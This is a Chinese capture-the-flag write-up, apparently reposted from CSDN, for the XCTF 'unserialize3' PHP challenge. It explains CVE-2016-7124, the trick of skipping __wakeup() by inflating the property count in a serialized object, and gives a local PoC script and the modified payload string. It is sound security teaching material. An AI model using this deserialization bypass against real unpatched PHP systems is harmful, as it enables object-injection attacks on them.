首页 最新 热门 推荐

  • 首页
  • 最新
  • 热门
  • 推荐

攻防世界 - Web - Level 1 | unserialize3

  • 25-02-16 18:00
  • 2611
  • 6353
blog.csdn.net

关注这个靶场的其它相关笔记:攻防世界(XCTF) —— 靶场笔记合集-CSDN博客

0x01:考点速览

本关考察的是 PHP 反序列化漏洞,过关之前需要先了解以下知识:

  • PHP 反序列化绕过 __wakeup => CVE-2016-7124 PHP 反序列化漏洞

    • 如果序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过 __wakeup 函数。

      • 注意:通过 GET 传参时,需要使用 %00 截断私有变量。

0x02:Write UP

访问靶场,页面回显代码如下:

将页面代码复制下来,以方便在本地进行序列化操作:

  1.  // FileName : poc.php
  2.  
  3.  class xctf
  4.  {
  5.      public $flag = '111';
  6.      public function __wakeup()
  7.     {
  8.          exit('bad requests');
  9.     }
  10.  }
  11.  ​
  12.  $a = new xctf();
  13.  # 对 xctf 对象进行序列化
  14.  print_r(serialize($a)); // 输出:O:3:"xctf":1:{s:3:"flag";s:3:"111";}

通过分析代码,我们发现,当我们传入序列化后的值,会进入 __wakeup() 函数,程序会直接终止执行,并弹出 bad requests 页面:

 O:3:"xctf":1:{s:3:"flag";s:3:"111";}

所以我们这里就需要绕过 __wakeup() 方法,此处使用的是 CVE 2016-7124 —— PHP 反序列化漏洞:在序列化后的字符串中使表示对象属性个数的值大于真实的属性个数即可触发该漏洞,绕过__wakeup方法。

 O:3:"xctf":2:{s:3:"flag";s:3:"111";}

注:本文转载自blog.csdn.net的Blue17 :: Hack3rX的文章"https://blog.csdn.net/m0_73360524/article/details/144497330"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。
复制链接
复制链接
相关推荐
发表评论
登录后才能发表评论和回复 注册

/ 登录

评论记录:

未查询到任何数据!
回复评论:

分类栏目

后端 (14832) 前端 (14280) 移动开发 (3760) 编程语言 (3851) Java (3904) Python (3298) 人工智能 (10119) AIGC (2810) 大数据 (3499) 数据库 (3945) 数据结构与算法 (3757) 音视频 (2669) 云原生 (3145) 云平台 (2965) 前沿技术 (2993) 开源 (2160) 小程序 (2860) 运维 (2533) 服务器 (2698) 操作系统 (2325) 硬件开发 (2491) 嵌入式 (2955) 微软技术 (2769) 软件工程 (2056) 测试 (2865) 网络空间安全 (2948) 网络与通信 (2797) 用户体验设计 (2592) 学习和成长 (2593) 搜索 (2744) 开发工具 (7108) 游戏 (2829) HarmonyOS (2935) 区块链 (2782) 数学 (3112) 3C硬件 (2759) 资讯 (2909) Android (4709) iOS (1850) 代码人生 (3043) 阅读 (2841)

热门文章

101
推荐
关于我们 隐私政策 免责声明 联系我们
Copyright © 2020-2025 蚁人论坛 (iYenn.com) All Rights Reserved.
Scroll to Top